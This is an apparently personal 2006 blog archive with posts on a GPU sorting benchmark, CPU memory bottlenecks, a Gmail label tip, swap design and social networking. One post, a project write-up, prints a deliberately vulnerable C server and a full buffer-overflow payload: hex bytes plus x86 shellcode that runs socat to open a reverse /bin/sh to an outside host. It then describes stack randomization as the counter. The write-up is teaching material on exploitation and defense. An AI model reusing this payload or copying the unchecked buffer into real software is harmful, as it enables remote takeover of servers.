Defective Compass

Sort Benchmark Medal

Posted in Computing by defectivecompass on June 25, 2006

Okay, we just received really cool medals for breaking the Sort Benchmark using GPUTeraSort!

gpusort_medal.jpg

Seattle

Posted in Travel by defectivecompass on June 25, 2006

dscf0034.JPGdscf0022.JPGdscf0016.JPGdscf0003.JPG

Went there for a Microsoft internship interview. Lovely Place.

Shashi, Gagan and Rakesh

Posted in Social by defectivecompass on June 25, 2006

dscf0025.jpg
I think it was the job season and Gagan had said in his interview with Adobe "I'm not interested in your Company". We had to celebrate the occasion.

From left: Shashi, Gagan, Rakesh (I am taking the pic :( )

Landmark Treat, Kanpur (Photos)

Posted in Social by defectivecompass on June 25, 2006

Landmark 1Landmark 2Landmark 3

Treat for Gchak's B'day Celebration.

Color Code:

Black -> Rakesh

Gray -> Ragesh

Yellow -> Gchak

Orange (yuck) -> Me

Batch of 2003 IIT Kanpur (Photo)

Posted in Social by defectivecompass on June 25, 2006

IITK Batch of 2003
This is the batch of 2003 from IIT Kanpur. Find me 5th from the right in the middle row.

From the left

Top row: Diwaker Gupta, Manish Shrivastava, Murari, Abhaya Agarwal, Jitender Sharan, Hitesh Shah, , Priyendra Singh Deshwal, Mrinal Vikram, Ajay Kumar Verma, Raka, Supriyo Bose, Jyotsna Gangwar.

Middle row: Asim Shankar, Nikunj Raghuvanshi, Vibhanshu Abhishek, Comandur Sheshadri, Anurag Aggarwal, myself, Manu Chhabra, Veneet Kumar, Madhur Ambastha, Nitin Jain

Bottom row: Gaurav Bansal, Anusheel Nahar, Divick Kishore, Manikant Kumar, Raju Kumar, Gaurav Sharma, Abhishek Tiwari, Vivek Pandey, Ragesh Jaiswal, Gaurav Chakraborty, Kapil Narula

Missing: Akshi Singh, Ankur Khandelwal, Gagan Gautam, Prathmesh Kant, Rakesh Kumar, Syed Atif Hussain, Yogesh Chauhan

Learning from GPUSort

Posted in Computing by defectivecompass on June 25, 2006

Something surprising and amusing happened near thanksgiving 2005. No, god didn't physically appear to receive my thanks… no, not that. I was working during thanksgiving 2005 on the GPUSort project (with the project lead, Dr. Naga Kiran Govindaraju). The surprising thing was that we were working on breaking the Sorting benchmarks hosted by Jim Gray at Microsoft Research using err… a GPU. GPUs have received a fair amount of hype these days for their compute power. However, working intimately on a realistic, working, practical, compute based project using GPUs gave me a lot of opportunity to learn about how a GPU achieves this power, whereas two Dual core Xeons fall short of the task. Let me take this opportunity to share my experiences and insights.

The GPU Sort algorithm

The GPU sort as evident from the name, does the sort operation on the GPU. Since the data sizes that are being handled here are larger than the memory present in systems, we sort chunks of data first and merge all the chunks thus obtained. We call these two phases as the "internal sort" phase and the "merge" phase. The merge phase is completely on the CPU. However, the internal sort happens on the GPU and CPU combined. We use a hybrid bitonic radix sort for the internal sort. The GPU sorts the data on the first 4 bytes of the data (actually 30 bits) and returns the ordering. The CPU does the rest of the ordering. This kind of a scheme utilizes both the GPU and the CPU and gives us the highest performance.

The GPU cannot do string compares. Hence, the keys are first converted into floating point numbers so that they can be operated inside the GPU. This data representation change is done on the CPU. In fact, the internal sort phase has a 5 stage pipeline and we observed that we could run all of these in parallel at the bottleneck IO rate.

  • Read data from disk.
  • Generate floating point numbers for the first 30 bits of the key.
  • Sort the data using these 30 bit keys on the GPU. Complete the rest of the sort on the CPU.
  • Re-order the satellite data given the complete sort order.
  • Write the sorted records to the disk.

As you might imagine, Reading and Writing from disk are the bottleneck stages running at 200MB/s (We use a 4 SATA disk RAID for input and a separate 4 SATA disk RAID for output). Generating floating point numbers is very fast (1GB/s). Sorting (GPU and CPU combined) runs at 300MB/s and reordering runs at 500MB/s. However, the above rates are observed when the system is running just that stage. These stages share a lot of hardware resources on the system (CPU, bus, memory) and it was quite a balancing act to get all of them working in lockstep.

The GPU has a restricted compute model. The best way to describe its compute model would be to think of a programmer supplied function which takes in the current pixel coordinates as argument. The function computes the value of the pixel. The GPU takes care of calling this function (order unspecified) and takes the burden of actually putting those pixel values on screen. Thus, a GPU program doesn't have a lot of freedom in memory writes (the only writes possible are of new pixel values at gpu-determined screen(/texture) locations). Thus, a normal CPU sort algorithm (like quicksort) doesn't fit very well with the GPU compute model. The GPU sort uses a parallel bitonic sort to perform its sorting and that fits the compute model much better. It is interesting to note that bitonic sort has a worst case (and also the average case) runtime complexity as O(nln2(n)) which is slower than most CPU sort algorithms (O(nln(n))).

The sorting on the CPU is performed using an insert sort variant. This is because, once the data is sorted on the first 30 bits, the unordered data typically appears in small contiguous chunks for which insert sort is very good.

Disk I/O is also a tough nut to crack. Sequential file I/O (Windows XP) allows us 50MB/s from a SATA disk (Western Digital Caviar). A 4-way software RAID provided us with 200MB/s of disk I/O. We use asynchronous I/O with a large number of outstanding requests and large buffers to get the bandwidth. Surprisingly, software RAID seemes to work very well for our job even though it is widely believed to be inferior than hardware RAID.

The merge phase uses a priority heap to merge the sorted chunks. Even here, direct string comparisons performes poorly. The keys are converted to integers, comparing which proves to be a lot faster. To feed the priority heap with data, we keep two input buffers per sorted chunk one of which is used for I/O and the other used for the actual merge. Similarly, two ouput buffers are used to run merge and output to disk in parallel. For the disk input, to sustain high disk I/O rate, quite a few buffers are prefetched together. This is made possible as we pre-calculate the entire buffer prefetch order for the merge in the internal sort phase itself.

The numbers

The benchmark we broke is the Indy Pennysort benchmark. It basically consists of sorting 100 byte records which have the first 10 bytes as its key. The order between the records is defined by a strncasecmp() (or strnicmp() in windows speak) on the key. It is mandatory to fetch these records from the filesystem and write the sorted records back to the filesystem, which means that high bandwidth IO is also required. The benchmark is to sort at maximum speed in the least amount of money.

Previous benchmark holders have very impressive numbers. They can sort 40GB (433M records) in 1541 secs on a $614 linux/AMD system. This is equivalent to a sorting speed of nearly 25MB/s. Details about the setup can be found at the page linked above. We have been able to achieve 25GB (255M records) in 300 seconds on a $1600 Windows/Pentium/Geforce 7800GTX system. This brings us to around 85MB/s. Hence we break the benchmark by (85MB/s / $1600) / (25MB/s / $600) = 1.275 times. The details of the setup and algorithms are present in our papers on the topic, the links of which should be coming soon. Here I would like to explain some of my insights (not present in the paper) about some of the problems CPUs face in gaining performance on a sorting like workload.

The Memory Bottleneck

It is very widely known that CPUs are way more capable of computation than the amount of data main memory can feed them with. This is often termed as a the Von Neumann bottleneck which is basically the limited capacity of the memory bus between the processor and memory. Most of the slowdown of programs is generally attributed to the memory bottleneck of systems. This is also the reason why increasing the cache on a system significantly boosts the compute abilities of the system. Thus, with more of the working set data of a particular program available in the cache, the processor doesn't overload the memory bus that much. The surprising thing is that GPUs also use memory which is similar to the conventional memory present in PC systems. (which is higher clocked DDR2 SDRAM. GDDR3 is also very similar.) Thus, there has to be something more than just the memory bus being a bottleneck in the PC. Like in any complicated system, the devil in the memory subsystem is in its details. An excellent overview of the way memory works can be found in the article "RAM – Memory Technology Overview" at Anandtech. I will briefly summarize the details here. To get to the processor, the data from the memory has to go over two buses. One is the front side bus (FSB) and the other is the memory bus. Fetching data from the memory involves many steps. It involves the processor requesting the memory controller to send commands to the memory modules. These commands are used to activate a "row" of memory and then a "column" of data from it is requested. The memory module then sends a burst of data (of the requested column) back to the memory controller which then sends the data to the processor (cache whatever…). This burst happens at the peak memory rate which is equivalent to the (FSB clock speed * width of the FSB). For eg. in case of a Pentium 4 with an FSB of 800MHz (which is pretty common these days), the peak memory transfer rate is 800MHz*4bytes = 3.2GBps. In fact the actual bus clocks of both the FSB and the memory bus are different than 800MHz and are actually the same (!!). It is generally the case that the FSB is clocked at 200MHz and is quad pumped (effective clock rate = 800MHz) and has a width of 4 bytes, whereas the compatible memory module is clocked at 200MHz and is dual pumped (DDR) and has a width of 8 bytes. As you might imagine, this doesn't mean that the processor has 3.2GBps dedicated access to the system memory. The various steps involved in fetching data from the memory have their latencies. They take valuable clock cycles (in terms of the actual clock cycle and not the effective clock cycle). This makes it difficult to even get close to peak memory performance (i.e. at the peak transfer rate).

40GBps is a lot of memory bandwidth… but wait!

GPUs have very high memory bandwidth… of the range of 40GBps made possible by a combination of higher clocking, dual pumped bus and wide memory bus width. However, the important lesson we should take from them is that it is possible to achieve peak memory performance there. GPUSort achieves the peak memory performance for all the operations it does on the GPU (and hence is memory bus limited (again :-| ) on the GPU). Where did all the memory command latencies go? Now, I don't know about the GPU internal hardware designs (does anybody besides the GPU guys?) but you can draw some logical conclusions from this. There is obviously some memory pipelining going on. In other words, the memory fetches and commands are timed and placed so well that latencies get hidden behind memory transfers. How could the GPU do that? This is precisely where the GPU compute model works wonders. A GPU generally has a number of "pipelines" through which computation is done. There at 16 pipelines in nVidia 7800 GT. Now, as I am told by GPU hackers, each compute pipeline calculates the value of a definite pixel on the screen. The programmer does not decide which pixel values is it calculating. The GPU decides that. Thus the GPU effectively pipelines the various operations of all its pipelines through its hardware resources including the memory. The job is made a lot simpler because the same program (called fragment programs) runs on all the pipelines.

Most PC systems have a single memory controller. And a single memory controller can do only so much. You do have dual channel memory controllers on some high end motherboards but I have not dug into the details on how effectively does it help pipeline memory requests. The conclusion we draw here is that the speed of the memory bus is not the problem for compute jobs on PCs. The non-effective pipelining of the memory requests and transfer bursts is more of the problem. I don't think I was ever able to achieve a rate of 3.2GBps of memory access. The highest I think I went in experiments was 1GBps (500MBps transfer of data from one buffer to another). I am sure I need much more careful experiments to figure out the exact numbers.

Where is all the compute? And why all this heat?

I thought a little before writing this section as I might be completely off on this one. CPU design is complicated and it is more complicated because of the fabrication process. However, I would like to present some insights while working on parts of GPUSort which made me aware of another CPU bottleneck (which I not surprisingly do find being addressed in the upcoming CPU designs). We all know that a CPU has (quite) a number of functional units inside. As instructions come to the CPU, the CPU sends parts of the instruction to various functional units where they get executed as soon as all the data they need to proceed is available. A scheduling engine like the Tomasulo engine is generally used for scheduling. Doing this provides instruction level parallelism which is vital for achieving performance from a processor. However doing this often means a whole lot of book keeping. The processor has to figure out the dependencies between the instructions before sending them to functional units. Then, the processor has to re-order the sequence in which the results are played back to the register file or main memory so that program semantics are not changed. All this is a fair amount of logic. It is not so widely known that this process doesn't scale either. This is because the complexity of interdependence of n instructions is proportional to n2. This basically means that we have to expend more and more computation to resolve the interdependence of instructions (and give off an equivalent amount of heat). The CPU designers seem to have come to some kind of conclusion that "it ain't scale no more".

The way I observed this was by checking the execution of a particular segment of my program for cache misses and branch mispredictions to find out the reasons for its slowdown. Intel vTune told me that there weren't as many cache misses and there weren't as many branch mispredictions either. It then struck me that all the instructions that I was trying to execute were highly dependent on each other. I really started leaning onto the "instruction dispatch bottleneck theory" when I observed the following. In a particular program segment, I had some computation and a 100byte memory copy repeated a number of times. In order to try to bunch memory copies together, I scheduled all the memory copies at a later time by doing some book-keeping. Then, after a whole bunch of compute was done I finally did the whole bunch of memory copy, where previously I was finely interleaving the compute and memory operations. The result was that the performance dropped by two times. Then I figured out that this memory copy was not dependent on any of the compute that was being done. I arrived at the conclusion that bunching the memory copies at the end basically hindered the parallelism between memory copies and the compute causing the significant slowdown.

The way upcoming CPUs are addressing this is by giving the programmer multiple channels to feed independent instructions. This might be either using Simultaneous Multi-Threading or SMT (Intel's hyperthreading) or by putting in multiple execution cores on the same processor. This brings the burden of separating dependent and independent instructions on the programmer who now has to multiprogram his application. Intel has also taken a radical and refreshing approach at this problem by proposing Explicitly Parallel Instruction Computing or EPIC for its Itanium line of processors. Instead of having multiple execution cores, these CPUs offload all the instruction scheduling off to the compiler and the application programmer and focus all the silicon on real compute. If done properly, this might be a good (and the only) avenue of raising single threaded performance of processors.

A Remote Exploit and its Counter

Posted in Computing by defectivecompass on June 25, 2006

The project was done on a linux system running on an x86 machine and this article assumes this henceforth.

Remote Exploit

Concept:

The remote exploit demonstrated in this project is a general remote buffer overflow exploit. Simply speaking, the idea is that the server uses a buffer on its stack to store the input from the network and while doing it fails to check bounds on the buffer. This allows a malicious attacker to send a payload to the server which overflows the buffer on the server corrupting the server’s stack.

However, corrupting the server’s execution stack arbitrarily causes the server to crash. This is not our primary motive. We would like to corrupt the stack in such a way that we are able to execute arbitrary code on the server machine. Hence a specially fabricated payload is sent to the server which includes code and some trickery causing the server to corrupt its stack and execute the code sent.

At a high level, a remote exploit works in the following manner. The execution stack of a process contains activation records of the functions which the process visits. At any point in time, the stack contains the activation records of all the functions which the process into which the process has entered and not yet exited. When a function calls another function, a return address (inside the callee’s code) is saved on the stack which enables the process to resume the callee once the called function is done. It is this return address which is clobbered by the malicious payload. Hence the buffer is overflowed till the point it hits the return address. The attacker attempts to clobber the return address on the stack with an address which points to its own code it sent in the payload. If things go fine (usually after some trial and error on the part of the attacker) then instead of returning back to the callee, the code in the payload is executed giving the attacker a way to execute arbitrary code on the system.

Implementation:

A custom server has been written to demonstrate the remote exploit. This server expects a string (say the name of a person) and returns a new string which includes the name and a message with it. The code which processes the request is shown below.

void handle_request(int client_fd)
{
        char name[BUF_SIZE];
        int r, t=0;
        int rand;
        fprintf(stderr,"address of name is %xn", name);
        //This section of code is the buffer overflow vulnerability. It writes to name[] till EOF and not till name[] is full.
        do{
                r=read(client_fd, (char*)(name+t), BLK_SIZE);
                t+=r;
        }while(r!=0);
        //Null terminate the data we got so that we can print it.
        *((char*)(name+t)) = '';

//Process the request.
        fd_send(client_fd, name, strlen(name));
        //Get a random string based on time.
        rand = (int)(time(NULL) % MAX_MSGS);
        fd_send(client_fd, msg[rand], strlen(msg[rand]));
}

Note that the buffer for the name is kept as a local variable (and hence allocated on the stack) and though its size is fixed, in the loop following it, the buffer is written to without any checks on its bounds. This represents a very typical buffer overflow vulnerability. We also print the address of the start of this buffer in the function for our convenience so that we know where is our payload going to be situated in memory.
Recalling that the stack grows downwards (high memory to low memory) on x86 systems we understand that overflowing the buffer name[] eventually hits the word on the stack which stores the return address to the callee of the function handle_request. We now construct a malicious payload (there is an implementation of a program which does that) such that it is padded with a “guessed” return address towards the end. The malicious payload looks something like this:

000000  90 90 eb 32 5e 89 76 30  8d 46 0f 89 46 34 8d 46  |...2^.v0.F..F4.F|
000010  23 89 46 38 c7 46 3c 00  00 00 00 b8 0b 00 00 00  |#.F8.F<.........|
000020  8d 4e 30 89 f3 8d 56 3c  cd 80 bb 00 00 00 00 b8  |.N0...V<........|
000030  01 00 00 00 cd 80 e8 c9  ff ff ff 2f 75 73 72 2f  |.........../usr/|
000040  62 69 6e 2f 73 6f 63 61  74 00 54 43 50 3a 72 69  |bin/socat.TCP:ri|
000050  74 65 73 68 31 2d 63 73  3a 39 39 39 39 00 45 58  |tesh1-cs:9999.EX|
000060  45 43 3a 2f 62 69 6e 2f  73 68 00 00 00 00 00 00  |EC:/bin/sh......|
000070  00 00 00 00 00 00 00 00  c0 f2 ff bf c0 f2 ff bf  |................|

Our guessed stack address is 0xbffff2c0 which we can see appearing twice at the end of the payload. The little endianness of the x86 architecture accounts for the bytes seen in reverse order. The rest of the bytes is the machine code representation of the following assembly program:

.text
.globl _start
        .type   _start, @function
_start:
# We directly start with a _start label and don't bother about going through a C startup code. Similarly we won't be linking to glibc for calling system calls. */
        jmp     L1              # 2 bytes (jump to the call instruction)
L2:
        popl    %esi            # 1 byte (the address of /bin/socat is now in %esi, this is because of the call instruction just before "/bin/socat and the call being made to this instr.)
        movl    %esi, 48(%esi)  # 3 bytes (prepare the address of the address of "/bin/socat")
        leal    15(%esi), %eax  # 3 bytes (prepare the address of the address of "TCP4...")
        movl    %eax, 52(%esi)  # 3 bytes
        leal    35(%esi), %eax  # 3 bytes (prepare the address of the address of "EXEC...")
        movl    %eax, 56(%esi)  # 3 bytes
        movl    $0, 60(%esi)    # 7 bytes (prepare the null address right after the address of address of "EXEC...")
        movl    $0xb, %eax      # 5 bytes (0xb is the execve sys_call)
        leal    48(%esi), %ecx  # 3 bytes (prepare sys call params)
        movl    %esi, %ebx      # 2 bytes (prepare sys call params)
        leal    60(%esi), %edx  # 3 bytes (prepare sys call params)
        int     $0x80           # 2 bytes

# exit code
        movl    $0, %ebx        # 5 bytes
        movl    $1, %eax        # 5 bytes (0x1 is the exit sys_call)
        int     $0x80           # 2 bytes
L1:
        call    L2              # 5 bytes
        .string "/usr/bin/socat"        # 15 bytes with the null terminator
        .string "TCP:ritesh1-cs:9999"   # 20 bytes with null terminator
        .string "EXEC:/bin/sh"  # 13 bytes with null terminator
#       The address to the "/bin/socat" is kept here.
#       The address to the "TCP4..." string is kept here.
#       The address to the "EXEC..." string is kept here.
#       A zero is kept here to supply to the execve syscall

If we assume that the control somehow reaches the start of this code (which is why we pad the payload with the return address at the end), then we see that first using a jmp and a call, the program tricks the machine into putting the address of the strings at the end on the stack. It then pops it out and calls on execve with the string as the program to execute. This program (/usr/bin/socat with its options) is able make a connection to a specific machine (ritesh1-cs.cs.unc.edu in our case here) and fetches commands to execute in a shell. Thus, if this code is executed, ritesh1-cs will see a connection request; when accepted, it gives us access to a shell (/bin/sh) running on the remote system.
The only task which remains is to guess the address of the buffer where the payload will be situated, so that we can construct a payload with the same address padded towards its end. The attacker can only guess that address; however, in our implementation we print the address of the buffer for our convenience and construct the payload using that.
Note that the size of our code in the payload may not be an integral number of words. In such a case we pad it with nops in the front to make it so. Padding with nops also helps in reducing some guess work from the return address, as now in a trial and error session, one can skip nop bytes for the next address to try.

The Counter

Concept:

The basic idea of the counter comes from the fact that the attacker has to be good at guessing the address of the buffer where the payload will be loaded. In general, standard systems with default configurations have little variation in the placement of activation records on the stack from system to system. Thus, having known the address of a buffer in one system, an attacker can easily guess (with few trials) the address of the buffer on another system. However, if on every trial from the attacker, the activation record of the vulnerable function is placed at a different random location in the stack, then the attacker will not be able to guess it over many trials. We will henceforth call this technique Stack Randomization and will see a way to easily implement this.
Note that this technique has a few limitations. First, it is not possible to stop the attacker to guess the randomized address of the buffer once the server has already been started. Thus, if the server say is a forking server, the address of the buffer is not different in the various forks of the same process. The attacker could potentially use this to guess the address after a number of tries. However, if the server crashes and respawns while being attacked, (which might happen if the attacker is trying different kinds of payload on it), then the stack address will be randomized once again.

Implementation

Please read the accompanied document for the rest of the content. Source Code is present here.

Email folders in Gmail

Posted in Internet by defectivecompass on June 25, 2006

I absolutely fell in love with gmail once I started using it. I currently use it for my primary mail and am very happy with it. However, when I would talk to my friends about gmail their major grudge seemed to be the lack of "folders". I naturally would tell them about gmail's labels and how it is a more general concept than folders. The basic argument they would give me would be how using folders to sort mail (using filters) leaves the inbox uncluttered and allows one to prioritize mail handling. I saw a point in their argument. Essentially they wanted a way to hide all the mails on a label from the main inbox view… though they would prefer to keep the uncategorized mail in inbox.

One day I subscribed for a really high volume mailing list and searched frantically for a way to hide the mails under a label. Not being able to do that I unsubscribed but continued my search for a way. Then on visiting the page mentioned in the note above I saw a very easy of achieving the same. The basic idea is that gmail's inbox itself is some kind of a label. You should be able to see this when you go to 'All Mail'. By default, gmail marks all incoming mail with the inbox label. Assuming that you have a filter to automatically label the mails, you edit the filter of the given label and enable "Skip the Inbox (Archive it)" [on the second pane for editing labels]. The mails filtered by this filter will still be visible in 'All Mail' but won't show in the inbox. However, you will see the unread count in the label corresponding to it in exactly the manner folders work.

Hope this helps. Criticism, suggestions are welcome.


This tip is largely because of the following web page. However, the author doesn't really stress on the part of hiding the mails from the inbox display using this technique. I had searched quite a lot for this on google and had found no answer. So I thought I would write it down.

The Swap: A UNIX legacy

Posted in Computing by defectivecompass on June 25, 2006

The concept of virtual memory was big leap in operating systems. It provided programmers and system hackers (who hack above the kernel) a power which brought elegance and simplicity into a lot of applications in userspace. With virtual memory a process could be given a complete address space without worrying about how the memory is being used by other processes. This allowed a lot of simplification in code text, heap and stack allocation to programs which made linkers and loaders simpler and the runtime more elegant. Virtual Memory allowed processes to be able to memory map not just RAM but also files and devices which allowed runtime optimization of the amount of physical RAM used by programs. For eg. processes which run the same program share the RAM segments of the code text. Copy-on-write with virtual memory made it into a very simple and elegant system for managing the memory with mixed shared and private content between processes. However, I think that virtual memory can be used more powerfully than its being presently used.

The Disjoint between Swap and Storage

Let me start with a problem with the UNIX swap system which would expose some of the issues with virtual memory. Swap on UNIX as we all know is some space in the secondary storage (typically the disk), which the OS uses to temprarily store the memory contents of processes when the OS is short on memory. This allows more programs than what could fit the physical RAM to run simultaneously as the RAM and the Swap together is the amount of ‘memory’ that the OS has with it. Consider say, a text editor process in which the user is editing text. In the text editor process, one will typically find the following chunks of memory.

  • The text editor program’s code (called the text region)
  • The heap, which possibly contains the entire file data in memory
  • The stack

Of the above, the program text has large parts of its already shared with other processes because of use of shared libraries. The stack and the heap contain data representing the current state of the process. This cannot be shared (or picked directly from the disk as with shared libraries or executables) as the contents depend on the runtime state of the program.

Almost all text editors support some kind of autosave feature which makes sure that even if the user doesn’t save the text he is editing regularly, it still gets saved. This is useful if for some reason there is a crash. However, almost all filesystems come in its way by making sure that they buffer the data prior to saving so that performance is maximized. Hence, even though the file was ‘autosaved’ it was actually not commited to disk. In case of an OS crash the user has to deal with not only potential loss of data since the last autosave was done, but also the loss of data before the autosave as the filesystem might have not synced itself with the disk. Also, the disk data which is buffered is buffered in a separate part of RAM. What we basically see here is wastage of RAM and also not achieving either filesystem performance (as the text editor tries to autosave much more frequently) or robust autosaving, as filesyetm buffering comes into its way. With this existing confusion between software components lets introduce the swap. Consider that in the middle of the editing session, the user just left the program (without saving ofcourse) and went to play a game. This game swaps out almost all other processes into the swap (including the text editor) because it itself requires a large amount of RAM. Note that the editor’s stack and heap and banished to the swap which means that the unsaved data in the text editor is now on the swap. As the game runs, the editor comes alive in the middle of the game to autosave the unsaved data. It fetches this data from the swap, and then writes it to the disk. The filesystem buffers it and finally puts it to disk. Thus, not only are two chunks of precious RAM used for the editor’s data, the swap is used to temprorarily store something on the disk which could have been permanently stored on the disk right away.

The example above gives us some insight into the disjoint between swap and storage that we have on today’s systems. It would have been so much better if before swapping out the text editor process, the OS would have somehow autosaved it. A quick and dirty approach would have been that the OS somehow just notified the editor that it was about to be swapped. The editor would then save the file and release the memory used by the data (and would restore once it is swapped in). However, this method has too many issues. First of all, in current systems, there is no such concept as a process being swapped out. Some pages in memory are swapped out which are probably not being used. The process continues to run. Secondly, it will be hard for the OS to figure out how much time to give to the process to flush its data to the hard drive. If the OS uses a function hook from the process and executes it synchronously, then there is a chance that the application hook never returns, effectively bringing the OS to a halt. A ‘timeout’ based mechanism seems to be rather clumsy.

Marrying Data Model with the VM

A good solution to the problem can be the following. In the same spirit as “memory mapping” portions of files to memory, the VM is extended to support a data model. Let us call this extention XVM. Thus, unlike memory management functions like malloc() and free(), there would be separate allocation and deallocation functions for XVM. These, besides taking the data type and size arguments, will also take a name in the permanent store argument. The XVM would know exactly how to translate between the memory and disk representations of the data types and would use RAM only as a cache for the content of the data type. Thus, while programming, the moment the programmer has to deal with data which is supposed to be in permanent storage, he uses the XVM APIs to allocate memory for them. The OS takes care of associating the name in the permanent storage to the data content and translating between the representations. This allows the OS to flush these parts of memory to disk when it needs physical RAM. Also, the XVM notifies the program whenever it flushes the data to the disk so that the program knows. Of course the program itself has the power to flush the data to disk. However, the OS reserves the right to take this as only a hint.

There is one catch though in the above solution. The code which translates between the memory and disk representations has to be part of the OS. This is because the OS requires a guarantee on whether the code really terminates in a short amount of time. For this it will have to use its own code to do the translation. This means that there will not be application specific variety in the data model. It should be noted that this is not a very big problem as a database model for persistent storage would be sufficient for all applications. For applications with very specific needs, it is always welcome to work with the XVM backend of a simple memory mapped style allocated space for its permanent store. This would be the application’s persistent store format. The application would itself keep this backend uptodate depending on its actual data model semantics. The key to the success of this scheme would be an efficient way of interacting with the persistent store format in the language of the in memory data model.

On Socio-Networking

Posted in Internet by defectivecompass on June 25, 2006

The easy, flexible and distributed way

All of this probably goes back to the day when I got my first orkut invite from one of my friends. I didn't even know what orkut was then (am I not ignorant?). However, I did create an orkut account and accepted my friends invitation. Even though the site was full of activity I found very little "use" of it. Yes, its okay to have a list of friends and be able to network to friends of my immediate friends…. however, I felt that this whole socio networking thing would fit much better if it was accompanied by another relevant service. For eg. like the recent Yahoo 360 (which is still in beta), uses a background socio network for its blogs and photo sharing service. It makes little sense to have just a socio network site. Ideally, there should be a socio network (if possible a single one so that lesser mortals like me are spared the hassle of registering at thousand and one services) which ties together a complete array of services. Moreover, it would be really nice if these services didn't require a special framework to be tied in to the socio network.

The biggest use (besides the lovely idea of socio networking itself – the friends of friends concept) is to possibly keep an updated addressbook. You don't have to burden yourself with polling and updating your friend's contact info… instead he or she updates just him or her's and it reflects at all addressbooks generated by our socio networking engine. I know that there exists a service called myaddressbook.com which does exactly the same. However, it isn't tied with the socio-network-a-group-of-arbitrary-services concept.

The other important property we would like to have from this engine is to make it completely distributed and easy to maintain/install by an individual. Having it distributed avoids a single point of failure and more importantly opens it to customization and other implementations.

Implementation

Let me chalk out a very simple implementation. This focusses on all those guys who like hosting a personal website of their own and use either their own webspace or some other service on the internet for all the other stuff. The best way to abstract out the service is "some text + possibly a URL". The idea is to host a file which contains one's contact info and other socio-networking data on a web server (the one on which a person hosts his website will do just fine) and let interested people remotely include it in their HTML. The file follows a loose standard so that each person remotely including the file in his/her website is able to customize the presentation in an appropriate way. It would have been easy if HTML supported a tag which could let us include an HTML file write within another. However, because it doesn't (this could have been so useful!) we use a workaround. It is possible to include a .js (javascript) file using a script tag. Hence, we use numerous document.write("") statements in a .js file to output HTML. This .js file is included by a script tag into the HTML of whoever wants to include the person as a friend on his site.

The presentation and placement of the content remotely included by the page can be customized using CSS. The "friends" get their freedom of listing whatever they feel like on their .js files. They can included any URL along with some meaningful text in their .js to publicise different parts of their website or services they would like their friends to browse. It remains distributed as each person creates a webpage which remotely includes all their friends .js files.